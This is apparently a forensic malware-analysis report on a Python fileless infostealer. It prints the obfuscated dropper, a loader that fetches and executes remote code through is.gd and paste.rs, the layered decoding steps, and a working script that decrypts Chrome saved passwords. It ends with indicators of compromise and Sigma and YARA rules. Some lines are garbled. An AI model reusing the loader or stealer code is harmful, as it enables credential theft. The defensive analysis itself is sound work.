Redazione RHC : 26 June 2025 15:33
TLP: AMBER
Analyst: Agostino Pellegrino, Crescenzo Cuoppolo, Alessio Bandini
Last revision date: 2025-06-24
This forensic technical report documents the complete analysis of a multi-stage infostealer delivered via a Python fileless loader, identified with the acronym “AP”. The entire infection chain runs in memory and exploits legitimate public services (Telegram, is.gd, paste.rs) to avoid detection and simplify remote payload update.
The initial file, called Photos, contains a dropper that dynamically executes a second obfuscated stage, which in turn decodes and executes in memory an infostealer capable of exfiltrating sensitive information from Chromium browsers.
The Photos file contains obfuscated Base64 code:
___________ = 'ADN_UZJomrp3vPMujoH4bot'; exec(__import__('base64').b64decode('...'))
Code decoding:
import requests, re
exec(
requests.get(
requests.head(
f'https://is.gd/{match.group(1)}', allow_redirects=True
).url
).text
)
if (
match := re.search(
r'Operation:
Content downloaded from https://paste.rs/fVmzS. Executes the following chain:
exec(__import__('marshal').loads(__import__('zlib').decompress(__imp ort__('base64').b85decode("c$|c~*|PFlk|y|1XNVIgA|vOF$g0Ys7>c3D)_@p{S!e)(1e%eo3lNe(LIXmGNenkpZCz$After b85 → zlib → marshal, one more step is needed:
decoded = bytearray([b ^ 0x04 for b in payload_bytes])
The result is a deobfuscated bytecode that can be executed directly in memory:
import os, shutil, zipfile, sqlite3
from Cryptodome.Cipher import AES
import win32crypt
import json
import base64
# Extracting data from Chromium (simplified)
def get_chrome_data():
local_state_path = os.path.expanduser('~') + r"AppDataLocalGoogleChromeUser DataLocal State"
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = json.loads(f.read())
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]
key = win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
login_data_path = os.path.expanduser('~') + r"AppDataLocalGoogleChromeUser DataDefaultLogin Data"
shutil.copy2(login_data_path, "Loginvault.db")
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
for row in cursor.fetchall():
login_url = row[0]
username = row[1]
password = win32crypt.CryptUnprotectData(row[2])[1].decode()
print(f"URL: {login_url}nUsername: {username}nPassword: {password}n")
cursor.close()
conn.close()
os.remove("Loginvault.db")
get_chrome_data()
The resulting code:
| Type | Value |
| SHA256 (Photos) | 06a882d2b7e17a84d2707b2a2a5a27b0b18dc6cf503a694295bfcd6fe98a3a39 |
| You legram | https://t.me/ADN_UZJomrp3vPMujoH4bot |
| is.gd | https://is.gd/fVmzS → https://paste.rs/fVmzS |
title: Python Fileless Loader via Telegram and is.gd
logsource:
category: process_creation
product: windows
detection:
selection:
Image: '*python.exe'
CommandLine|contains:
- requests.get(
- exec(
- t.me/
- is.gd/
condition: selection
level: high
description: Detect fileless Python droppers with remote payloads
rule Fileless_Telegram_Loader {
half:
description = "Detect Telegram-based fileless loader + is.gd"
author = "Agostino Pellegrino (apinfosec.com)"
version = "1.1"
date = "2025-06-24"
strings:
$a = "exec(requests.get(" ascii
$b = "https://t.me/" ascii
$c = "https://is.gd/" ascii
$d = "og:description" ascii
condition:
all of them and filesize The technical analysis conducted highlighted the high level of sophistication of the “AP” infostealer, capable of operating completely in memory, eluding most traditional detection mechanisms. The multi-stage infection chain uses a fileless dropper written in Python and exploits legitimate public services — such as Telegram, is.gd and paste.rs — to convey, update and make dynamic the final payload.
The second, heavily obfuscated stage culminates in the execution of an infostealer with advanced data exfiltration capabilities from Chromium-based browsers, including saved credentials, cookies, history and sensitive information.
The creative and malicious use of common mechanisms (such as HTML meta tags, shortened URLs and messaging services) makes this threat particularly insidious, demonstrating a growing trend of abusing legitimate infrastructures for illicit purposes.
The MITRE ATT&CK techniques identified confirm the stealth and modular behavior of the malware. The adoption of specific detection mechanisms, such as custom Sigma and YARA rules, is essential to effectively mitigate this threat. Furthermore, the implementation of restrictive policies and continuous monitoring of unmanaged Python environments are measures priority defensives.
This case study represents a clear example of the evolution of modern infostealers towards completely fileless architectures, with persistence and update capabilities that require an equally dynamic and proactive defensive response.
Redazione